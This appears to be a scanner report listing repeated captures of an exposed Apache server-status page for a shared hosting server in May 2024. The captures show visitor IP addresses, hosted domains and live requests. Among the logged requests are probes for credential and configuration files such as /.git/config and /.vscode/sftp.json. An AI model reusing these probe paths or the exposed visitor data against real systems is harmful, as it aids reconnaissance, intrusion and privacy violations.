      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 27-May-2024 00:00:07 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 19 hours 55 minutes 17 seconds
      Server load: 0.33 0.32 0.37
      Total accesses: 535412 - Total Traffic: 77.4 GB - Total Duration: 593345876
      CPU Usage: u313.69 s40.35 cu2211.63 cs479.04 - .92% CPU load
      1.62 requests/sec - 245.2 kB/second - 151.6 kB/request - 1108.2 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 191 idle workers
      ________________________K_____W_________________________________
      ___K_______.........................____________________K_______
      _______________K______..........................................
      ........____WK__________________________K_______________________
      __________________K.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-235250/215/2591_
      25.8316122485990.036.83341.98
      2.90.119.46http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-235250/137/2208_
      25.691386614132000.034.92368.04
      51.36.219.161http/1.1albayan.edu.sa:443GET /web/23.html2 HTTP/1.1
      
      0-235250/216/2345_
      25.8239211815310.012.23311.09
      31.167.120.86http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/10/WhatsApp-Image-2021-09-05-at-12
      
      0-235250/152/2347_
      25.2437037387294530.018.26274.31
      176.224.34.59http/1.1
      
      0-235250/155/2429_
      25.59322220874200.039.83344.17
      142.154.10.35http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      0-235250/195/2228_
      25.751108321638000.071.71359.52
      162.158.129.115http/1.1qr.brunch.ws:443GET /foods/create HTTP/1.1
      
      0-235250/236/2413_
      25.76846421057890.073.09307.28
      54.36.148.189http/1.1albayan.edu.sa:443GET /web/24.html2 HTTP/1.1
      
      0-235250/189/2247_
      25.662131814354130.014.32324.32
      47.88.6.178http/1.1wahjcm.com:443GET /Public/home/js/check.js HTTP/1.1
      
      0-235250/236/2825_
      25.849127013920.089.35525.85
      2.90.119.46http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-235250/212/2422_
      25.50443716850440.016.12389.38
      172.70.90.154http/1.1qr.brunch.ws:443GET /storage/food_image/17167566736092_photo20200714132259.jpg 
      
      0-235250/186/2112_
      25.484692394215088840.011.28365.33
      176.18.103.240http/1.1albayan.edu.sa:443GET /images/slider/04.jpg HTTP/1.1
      
      0-235250/201/2753_
      25.51394218228610.016.65242.09
      176.18.103.240http/1.1albayan.edu.sa:443GET /web/images/folder.gif HTTP/1.1
      
      0-235250/156/2487_
      25.76576921499900.049.61459.39
      54.36.148.56http/1.1albayan.edu.sa:443GET /web/38.html HTTP/1.1
      
      0-235250/156/2440_
      25.662145410909380.024.93346.63
      47.88.94.161http/1.1wahjcm.com:443GET / HTTP/1.1
      
      0-235250/192/2556_
      25.65244023526790.015.52290.18
      54.36.148.179http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=907&t=54.36.148.4&c=5 HTTP/1.
      
      0-235250/235/2211_
      25.475092310853600.029.43442.13
      66.118.141.58http/1.1jawad.com.sa:443POST /api/v.1/front/search/product HTTP/1.1
      
      0-235250/173/2237_
      25.68201408860350.029.74437.13
      172.69.43.149http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-235250/275/2376_
      25.642805118193040.020.02384.84
      162.158.129.170http/1.1qr.brunch.ws:443GET /foods/create HTTP/1.1
      
      0-235250/187/2615_
      25.67208314036890.026.27346.43
      66.249.64.9http/1.1hawsab.me:80GET /?xei21003oofrq572.html HTTP/1.1
      
      0-235250/236/2485_
      25.53336722462500.012.21248.00
      37.106.151.194http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-235250/172/2368_
      25.052261021485350.084.59312.22
      139.64.44.250http/1.1
      
      0-235250/142/2297_
      25.652551812057220.033.00328.22
      162.158.129.165http/1.1qr.brunch.ws:443GET /login HTTP/1.1
      
      0-235250/136/2315_
      25.54334115714770.077.66430.43
      37.106.151.194http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-235250/222/2395_
      25.4514812109950.059.62342.47
      64.227.159.168http/1.1
      
      0-235251/187/2710K
      25.840117395980.748.84463.41
      172.70.243.29http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-235560/167/2217_
      25.79356329504410.085.84467.55
      176.18.103.240http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-235560/188/2311_
      25.87322228775750.059.79388.42
      142.154.10.35http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      1-235560/149/2333_
      25.892153813496220.09.20383.61
      47.88.6.178http/1.1wahjcm.com:443GET / HTTP/1.1
      
      1-235560/152/2163_
      25.84330017449490.046.11337.64
      54.36.149.60http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=804&t=54.36.148.109&c=5 HTTP/
      
      1-235560/241/2404_
      26.01506313290400.052.01313.98
      188.114.102.8http/1.1qr.brunch.ws:443GET /foods/create HTTP/1.1
      
      1-235560/198/2085W
      25.710012673300.015.54269.75
      172.71.250.27http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      1-235560/147/2125_
      25.55845712271900.013.21278.16
      51.36.220.186http/1.1
      
      1-235560/211/2252_
      25.77443116062900.065.74367.23
      213.180.203.73http/1.13dvi.com:443GET /robots.txt HTTP/1.1
      
      1-235560/190/2181_
      
      Found on 2024-05-26 21:00
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314042cb64d6

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 26-May-2024 15:38:55 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  3 days 11 hours 34 minutes 5 seconds
      Server load: 0.17 0.35 0.39
      Total accesses: 485574 - Total Traffic: 68.1 GB - Total Duration: 510713911
      CPU Usage: u319.42 s40.74 cu1973.8 cs430.48 - .919% CPU load
      1.61 requests/sec - 237.5 kB/second - 147.2 kB/request - 1051.77 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 217 idle workers
      _____________W_______________________________K__________________
      _________K___________________K__________________________________
      __________K_________________K__________________________________K
      ________..................................................______
      __K________________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-265560/231/2352_
      31.015521822074160.039.40304.96
      3.147.242.116http/1.1daris.live:80GET /assets/default/vendor/chartjs/Chart.min.js HTTP/1.1
      
      0-265560/257/2039_
      30.824856313475530.015.55331.87
      31.167.155.229http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=1 HTTP/1.1
      
      0-265560/246/2116_
      30.99140011454090.067.37297.93
      172.121.142.123http/1.1randalift.com.sa:443GET /admin HTTP/1.1
      
      0-265560/220/2178_
      31.030213775470.019.13253.17
      172.71.99.236http/1.1adyar.com.sa:443POST /wp-json/litespeed/v1/cdn_status HTTP/1.1
      
      0-265560/308/2264_
      30.76507217932660.023.50303.24
      162.158.129.132http/1.1qr.brunch.ws:443GET /storage/food_image/17096777357107_nutella.webp HTTP/1.1
      
      0-265560/214/2014_
      30.76507220793410.018.20287.28
      162.158.129.31http/1.1qr.brunch.ws:443GET /storage/food_image/17162859714946_earlygrayteacup.jpg HTTP
      
      0-265560/177/2143_
      30.78506519595540.09.98232.76
      162.158.129.175http/1.1qr.brunch.ws:443GET /storage/food_image/17162863763766_turkishcoffee.jpg HTTP/1
      
      0-265560/220/2039_
      30.85406212806120.027.19309.12
      151.254.153.67http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-265560/160/2577_
      30.77507215864190.088.96436.07
      162.158.129.44http/1.1qr.brunch.ws:443GET /storage/food_image/17162862904287_cappuccino.jpg HTTP/1.1
      
      0-265560/186/2194_
      30.83460113949610.037.54372.12
      3.147.242.116http/1.1filter.jawad.com.sa:443GET /public/front_resources/vue/header.js HTTP/1.1
      
      0-265560/203/1915_
      30.9912532214157150.026.97351.48
      3.250.23.237http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D8%A7%D9%84%D8%B1%D9%8A%
      
      0-265560/267/2539_
      30.86388316585420.031.16225.40
      66.118.137.113http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      0-265560/210/2296_
      30.32411419724230.042.46409.03
      37.243.214.174http/1.1
      
      0-265560/197/2267W
      30.750010592940.081.68321.49
      172.71.250.44http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-265560/319/2307_
      30.82478122569710.043.91273.47
      3.147.242.116http/1.1daris.live:80GET /assets/default/javascripts/view-custom.js HTTP/1.1
      
      0-265560/169/1955_
      30.81501399344530.084.01411.00
      31.167.155.229http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-265560/236/2036_
      30.982162578569840.069.40404.73
      5.108.90.205http/1.1albayan.edu.sa:443GET /imgweb/1445/2%20-%20%D9%84%D8%BA%D8%AA%D9%8A%20%D8%A7%D9%8
      
      0-265560/129/2074_
      30.79506716992210.069.94362.25
      162.158.129.92http/1.1qr.brunch.ws:443GET /storage/food_image/17088460069724_oip7.jpg HTTP/1.1
      
      0-265560/220/2403_
      30.88359212617190.029.77292.21
      176.224.34.86http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-265560/246/2208_
      31.0211217390920.017.36229.40
      3.147.242.116http/1.1n.jawad.com.sa:443GET /scripts/SelectBox.js HTTP/1.1
      
      0-265560/244/2165_
      30.66298120048480.038.61226.14
      188.53.229.68http/1.1
      
      0-265560/210/2114_
      30.6616809117060.014.22287.66
      5.108.90.205http/1.1
      
      0-265560/228/2162_
      30.76507314995010.011.33317.21
      162.158.130.75http/1.1qr.brunch.ws:443GET /storage/food_image/17088536269753_img680e14be8cba4bfcb7f68
      
      0-265560/242/2153_
      31.01113679370300.041.91282.61
      207.148.14.239http/1.1akg.sa:443HEAD /home HTTP/1.1
      
      0-265560/270/2452_
      30.97346214011340.077.36413.73
      188.53.226.100http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-265580/256/2035_
      30.11507627677480.016.97326.37
      162.158.129.159http/1.1qr.brunch.ws:443GET /storage/food_image/17096772331378_chickenburger.webp HTTP/
      
      1-265580/199/2110_
      30.423136713823950.030.36328.38
      172.71.114.20http/1.1qr.brunch.ws:443GET /foods/create HTTP/1.1
      
      1-265580/240/2160_
      30.44134013113780.021.88373.33
      3.147.242.116http/1.1erp.daaris.com:443GET /js/print.js HTTP/1.1
      
      1-265580/211/1991_
      30.3843430916234200.09.51272.51
      66.249.64.13http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%A7%D8%AC%D8%AA%D9%85%D8%A7%D8%B9%D9%8A%D
      
      1-265580/300/2124_
      30.39398459968390.019.56252.53
      40.77.167.30http/1.1albayan.edu.sa:443GET /e_sch/forum_replies.php?user=web2&i_f=463&page=1 HTTP/1.1
      
      1-265580/240/1874_
      30.16506910102380.031.12253.04
      162.158.130.60http/1.1qr.brunch.ws:443GET /storage/food_image/17162871303626_novawaterlarge.jpg HTTP/
      
      1-265580/182/1955_
      30.44118010175080.047.43264.54
      66.249.70.170http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      1-265580/247/20
      Found on 2024-05-26 12:38
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140e6995f49

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 23:59:27 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 19 hours 54 minutes 37 seconds
      Server load: 0.23 0.34 0.37
      Total accesses: 408118 - Total Traffic: 57.2 GB - Total Duration: 389511478
      CPU Usage: u149.73 s12.73 cu1770.94 cs375.09 - .944% CPU load
      1.67 requests/sec - 245.2 kB/second - 146.9 kB/request - 954.409 ms/request
      109 requests currently being processed, 0 workers gracefully restarting, 41 idle workers
      K__KKKKKK_KKKKKKKKKK_KK_K_________________________..............
      ..................W.............................................
      ......................KKK_KRKKKKKKK_KKKCKKKKKKK.................
      .................................KKKKKK_KKKK_KKKKKKWKKK_KKKKK___
      KKKKK_KKKKKKKKKKKKKKK_KKK_KKKKKKKKKKKKKKKKKK....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-153791/13/2037K
      2.881520248717.11.19246.73
      172.70.203.158http/1.1qr.brunch.ws:443GET /storage/food_image/17088519231693_img3622bfc18d474ecfbcfea
      
      0-153790/22/1681_
      2.69104849779230.07.39305.89
      114.119.128.233http/1.1daris.live:80GET /product/39 HTTP/1.1
      
      0-153790/19/1795_
      2.42928504800.02.26175.17
      102.164.97.68http/1.1
      
      0-153793/59/1859K
      2.9409107855711.20.53207.44
      172.70.203.149http/1.1qr.brunch.ws:443GET /storage/food_image/17162859544056_greenteacup.jpg HTTP/1.1
      
      0-153795/18/1837K
      2.9006155184515.26.81263.69
      172.70.203.141http/1.1qr.brunch.ws:443GET /storage/food_image/17085205464112_img3b46483c816c4b6f958ec
      
      0-153792/17/1641K
      2.920217840259.13.33252.71
      172.70.203.157http/1.1qr.brunch.ws:443GET /storage/food_image/17088535992345_img87d03a054fb04c81a8cc3
      
      0-153792/15/1882K
      3.000715151009.10.72212.17
      172.70.203.157http/1.1qr.brunch.ws:443GET /storage/food_image/17162871173606_novawatersmall.jpg HTTP/
      
      0-153791/15/1730K
      3.000110656940.80.16267.49
      172.69.214.159http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-153792/33/2302K
      2.970414526559.12.03342.31
      172.70.203.153http/1.1qr.brunch.ws:443GET /storage/food_image/17162864494425_frenchlatteaulatte.jpg H
      
      0-153790/18/1907_
      2.69009828950.07.36329.77
      5.109.175.76http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-153793/12/1619K
      2.99062130525611.22.09252.58
      172.70.203.148http/1.1qr.brunch.ws:443GET /storage/food_image/17088457993768_oip6.jpg HTTP/1.1
      
      0-153793/29/2146K
      2.9203149674211.15.67186.85
      172.70.203.130http/1.1qr.brunch.ws:443GET /storage/food_image/17088535024089_img94fe21be61cd47f8826a0
      
      0-153792/28/1948K
      2.920616644019.11.18353.54
      172.70.203.140http/1.1qr.brunch.ws:443GET /storage/food_image/17085177195757_whatsappimage20240221at3
      
      0-153792/20/1966K
      2.99077490139.14.33209.59
      172.70.203.157http/1.1qr.brunch.ws:443GET /storage/food_image/17162865757146_avogatovanilla.jpg HTTP/
      
      0-153794/31/1889K
      2.9604202876113.20.87221.52
      172.70.203.149http/1.1qr.brunch.ws:443GET /storage/food_image/17162862904287_cappuccino.jpg HTTP/1.1
      
      0-153791/55/1703K
      2.881128016297.10.61314.14
      172.70.203.138http/1.1qr.brunch.ws:443GET /storage/food_image/17085195308306_img2812ded58e2a4eb68e8e0
      
      0-153792/27/1641K
      2.96057679619.21.92329.44
      172.70.203.145http/1.1qr.brunch.ws:443GET /storage/food_image/17088498241713_imgaed1c999b4324fd6aed58
      
      0-153792/9/1859K
      2.980515527499.10.71285.24
      172.70.203.147http/1.1qr.brunch.ws:443GET /storage/food_image/17162865285267_saudicoffee.jpg HTTP/1.1
      
      0-153791/15/2058K
      2.841511720127.10.90253.35
      172.70.203.159http/1.1qr.brunch.ws:443GET /storage/food_image/17095843613277_scrambellbruscatta.webp 
      
      0-153792/18/1841K
      2.950415678189.10.54198.66
      172.70.203.131http/1.1qr.brunch.ws:443GET /storage/food_image/17162860982324_cortado.jpg HTTP/1.1
      
      0-153790/10/1817_
      2.751217616510.00.21176.72
      172.69.130.236http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-153792/20/1825K
      2.98066138249.10.97255.17
      172.70.203.147http/1.1qr.brunch.ws:443GET /storage/food_image/17162864712835_mocha.jpg HTTP/1.1
      
      0-153792/13/1856K
      2.950412457079.11.20293.09
      172.70.203.130http/1.1qr.brunch.ws:443GET /storage/food_image/17162860389733_maisonteacup.jpg HTTP/1.
      
      0-153790/10/1775_
      2.70028566380.06.47235.66
      5.109.175.76http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-153791/10/2084K
      2.891111157897.117.24284.04
      172.70.203.146http/1.1qr.brunch.ws:443GET /storage/food_image/17088571791773_img22d8f50a73dd4253ba14a
      
      1-186510/0/1670_
      0.000223348810.00.00304.21
      172.70.246.182http/1.1qr.brunch.ws:443GET /storage/food_image/17095826881606_smokesalmomcroissant.jpg
      
      1-186510/0/1791_
      0.000411920520.00.00281.33
      172.70.246.144http/1.1qr.brunch.ws:443GET /storage/food_image/17085175482929_whatsappimage20240221at3
      
      1-186510/0/1779_
      0.00079001010.00.00300.82
      172.70.246.169http/1.1qr.brunch.ws:443GET /storage/food_image/17162862769554_americano.jpg HTTP/1.1
      
      1-186510/0/1685_
      0.00010315066810.00.00249.78
      172.70.247.31http/1.1qr.brunch.ws:443GET /storage/food_image/17088572566240_img6ba5d51d4fb949a39e5e6
      
      1-186510/0/1709_
      0.000278439780.00.00226.70
      172.70.247.46http/1.1qr.brunch.ws:443GET /storage/food_image/17088499495311_img5d0fa3d62169406cac3fd
      
      1-186510/0/1544_
      0.0002529327620.00.00218.87
      199.45.155.32http/1.13dvi.com:443GET / HTTP/1.0
      
      
      Found on 2024-05-25 20:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314067a2a30f

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 25-May-2024 18:19:58 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 2
      Parent Server MPM Generation: 1
      Server uptime:  2 days 14 hours 15 minutes 8 seconds
      Server load: 0.31 0.34 0.38
      Total accesses: 381056 - Total Traffic: 51.1 GB - Total Duration: 347210964
      CPU Usage: u177.46 s21.2 cu1607.91 cs336.58 - .956% CPU load
      1.7 requests/sec - 238.9 kB/second - 140.5 kB/request - 911.181 ms/request
      10 requests currently being processed, 0 workers gracefully restarting, 215 idle workers
      ______________R_______________________K________________W__W_____
      __________________K________________________W____________________
      __K________________________K_______________________________K____
      ________________________________K...............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-132770/51/1892_
      7.24198417279900.00.76212.29
      209.38.208.202http/1.1
      
      0-132770/92/1529_
      7.6819617194150.030.74279.75
      209.38.208.202http/1.1akgsa.com:443GET /.git/config HTTP/1.1
      
      0-132770/89/1701_
      7.633109017717720.07.94168.30
      216.128.0.16http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/05_78105.pdf HTTP/1.1
      
      0-132770/111/1662_
      7.55471310559780.05.45192.08
      5.163.37.174http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/close_video_bg.png
      
      0-132770/77/1671_
      7.61335214246810.04.35244.44
      176.224.118.71http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-132770/54/1530_
      7.66233211591870.04.92239.06
      77.31.230.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/yu99ffjg8Fydviy5gzSjhh
      
      0-132770/44/1752_
      7.58431014598500.01.59204.11
      94.99.36.164http/1.1albayan.edu.sa:80GET /web/images/logo_school.png HTTP/1.1
      
      0-132770/57/1611_
      7.51496010400250.04.60260.15
      54.36.149.67http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=884&t=54.36.150.23&c=5 HTTP/1
      
      0-132770/90/2117_
      7.7515110210640.00.99316.15
      216.244.66.198http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-132770/51/1720_
      7.672392979456540.03.21304.20
      77.31.230.210http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-132770/88/1495_
      7.613533212572000.02.13222.89
      51.253.130.246http/1.1jawad.com.sa:443GET /public/front_resources/js/bootstrap.min.js HTTP/1.1
      
      0-132770/119/2012_
      7.63270214636380.05.34175.09
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-132770/79/1804_
      7.691054016274470.030.14343.88
      34.139.150.77http/1.1jawad.com.sa:443GET /en HTTP/1.0
      
      0-132770/43/1819_
      7.564705537332940.03.43196.87
      5.163.37.174http/1.1albayan.edu.sa:443GET /images/slider/05.jpg HTTP/1.1
      
      0-132770/39/1724R
      7.505298617864120.01.41141.46
      154.121.91.102http/1.1
      
      0-132770/50/1520_
      7.6720107169380.08.08282.40
      141.164.232.76http/1.1albayan.edu.sa:80GET /web/images/name_school.png HTTP/1.1
      
      0-132770/39/1533_
      7.708917080730.04.57294.14
      157.55.39.61http/1.1albayan.edu.sa:443GET /imgweb/book/mfiqhi1.pdf HTTP/1.1
      
      0-132770/49/1748_
      7.604019113040710.02.19275.44
      40.77.167.18http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1655&page=1 HTTP/1.1
      
      0-132770/97/1917_
      7.564494510291720.02.37210.04
      199.45.154.61http/1.1hawsab.me:443GET / HTTP/1.1
      
      0-132770/71/1733_
      7.7360210260620.029.24179.38
      46.251.148.88http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-tricks/assets/js/jet-tricks-fr
      
      0-132770/57/1688_
      7.73639306113657470.01.65160.05
      51.253.130.246http/1.1jawad.com.sa:443GET /jawad_catalog.pdf HTTP/1.1
      
      0-132770/79/1733_
      7.6524424566940.03.35215.26
      77.31.230.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/wkF0NxOfDQYLn1pNQm2Myh
      
      0-132770/90/1746_
      7.5843024098765430.07.49263.07
      66.118.169.141http/1.1albayan.edu.sa:443GET /imgweb/1445/4th-5th-6th%20BS%20QB%20T3-2023-2024.pdf HTTP/
      
      0-132770/84/1625_
      7.6719618265700.03.87220.60
      209.38.208.202http/1.1akgsa.com:443GET /about HTTP/1.1
      
      0-132770/35/1955_
      7.1638329612290.01.82261.55
      51.253.130.246http/1.1
      
      1-1287580/90/1557_
      16.4483322405420.016.90266.94
      50.60.43.49http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-1287580/116/1666_
      16.42192107511152190.07.15262.53
      141.164.232.76http/1.1albayan.edu.sa:443GET /images/slider/05.jpg HTTP/1.1
      
      1-1287580/133/1659_
      16.2448197287060.04.69222.80
      5.163.37.174http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      1-1287580/82/1596_
      16.36233210540950.06.86239.27
      77.31.230.210http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/gqczNWwWNkfNkUf8b9udpO
      
      1-1287580/78/1612_
      16.2645327180640.026.34212.42
      50.60.32.123http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      1-1287580/108/1447_
      16.352451358642210.012.98211.77
      77.31.230.210http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-1287580/129/1528_
      16.3038427554800.07.99190.77
      51.253.130.246http/1.1jawad.com.sa:443GET /public/front_resources/css/style.css HTTP/1.1
      
      1-1287580/130/1603_
